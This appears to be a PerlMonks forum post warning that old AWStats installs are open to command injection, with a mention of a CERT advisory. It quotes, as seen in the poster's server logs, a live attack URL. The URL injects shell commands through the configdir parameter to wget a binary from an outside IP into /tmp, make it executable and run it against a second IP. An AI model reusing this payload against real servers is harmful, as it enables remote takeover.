Hi monks,
luckily said directory is password protected and i have the latest patched version.
I use awstats which is a very good webstats app written in Perl. I just had this url thrown at a web server.
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024 +%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%202 +16%2e102%2e212%2e115;echo%20YYY;echo|
luckily said directory is password protected and i have the latest patched version.
Probably old news but just a warning to take some action if you have an old version of this installed. recent installs should be ok.
There was a CERT warning in february I think. Would hate to see tainted perl compromise any servers and didt find it in supersearch so there you go.
cheerioEdit g0n - added code tags
Edit g0n - moved from SoPW to News
update CERT link
Back to
Perl News